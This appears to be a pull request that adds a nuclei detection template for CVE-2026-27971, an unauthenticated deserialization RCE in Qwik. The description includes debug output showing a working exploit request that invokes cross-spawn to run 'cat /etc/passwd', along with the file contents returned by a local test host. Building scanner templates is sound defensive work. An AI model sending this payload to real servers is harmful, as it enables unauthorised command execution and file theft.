### PR TITLE
Add CVE-2026-27971 for Qwik RCE vulnerability

### DIFF
--- a/http/cves/2026/CVE-2026-27971.yaml
+++ b/http/cves/2026/CVE-2026-27971.yaml
@@ -23,7 +23,7 @@ info:
     verified: true
     shodan-query: http.html:"q:version"
     fofa-query: body="q:version"
-  tags: cve,cve2026,qwik,rce,deserialization,unauth
+  tags: cve,cve2026,qwik,rce,deserialization
 
 http:
   - raw:
@@ -43,9 +43,3 @@ http:
           - "status_code == 200"
           - "contains(header, 'application/qwik-json')"
         condition: and
-
-    matchers:
-      - type: regex
-        part: body
-        regex:
-          - "root:x:0:0"


### PR DESCRIPTION
Added CVE-2026-27971 for unauthenticated RCE in Qwik due to unsafe deserialization.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2026-27971
- References: https://vulnerabletarget.com/VT-2026-27971

```shell
nuclei -u http://localhost:3000/ -t vt-2026-27971.nuclei.yaml --debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.0

                projectdiscovery.io

[INF] Current nuclei version: v3.7.0 (latest)
[INF] Current nuclei-templates version: v10.3.9 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [vt-2026-27971] Dumped HTTP request for http://localhost:3000/?qfunc=sync

POST /?qfunc=sync HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.7.20) Gecko/ Firefox/3.6.5
Connection: close
Content-Length: 110
Content-Type: application/qwik-json
Origin: http://localhost:3000/
X-QRL: sync
Accept-Encoding: gzip

{"_objs":["\u0002./node_modules/cross-spawn/index#sync","cat","/etc/passwd",["2"],["0","1","3"]],"_entry":"4"}
[DBG] [vt-2026-27971] Dumped HTTP response http://localhost:3000/?qfunc=sync

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Content-Type: application/qwik-json
Date: Wed, 04 Mar 2026 11:33:32 GMT

{"result":"root:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/mail:/sbin/nologin\nnews:x:9:13:news:/usr/lib/news:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\ncron:x:16:16:cron:/var/spool/cron:/sbin/nologin\nftp:x:21:21::/var/lib/ftp:/sbin/nologin\nsshd:x:22:22:sshd:/dev/null:/sbin/nologin\ngames:x:35:35:games:/usr/games:/sbin/nologin\nntp:x:123:123:NTP:/var/empty:/sbin/nologin\nguest:x:405:100:guest:/dev/null:/sbin/nologin\nnobody:x:65534:65534:nobody:/:/sbin/nologin\nnode:x:1000:1000::/home/node:/bin/sh\n"}
[vt-2026-27971:regex-1] [http] [critical] http://localhost:3000/?qfunc=sync
[INF] Scan completed in 20.572541ms. 1 matches found.

```

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [X] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
